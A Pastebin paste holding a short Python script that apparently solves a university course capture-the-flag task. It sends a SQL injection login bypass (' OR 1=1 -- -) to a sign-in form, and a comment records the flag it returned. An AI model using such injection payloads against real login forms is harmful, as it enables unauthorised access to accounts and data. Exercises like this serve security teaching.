Advertisement
Guest User

Untitled

a guest
Sep 15th, 2019
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.25 KB | None | 0 0
  1. import requests
  2. import string
  3.  
  4. res = requests.post('http://shepherd.ii.uib.no:8001/signIn', data={"inputName": "' OR 1=1 -- -", "inputPassword": "ergeg"})
  5. if res.status_code == 200:
  6.     print(res.text)
  7. #{"gg": "GG! Flag: inf226{s0_y0u_c4n_b4s1c_5q71}!"}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement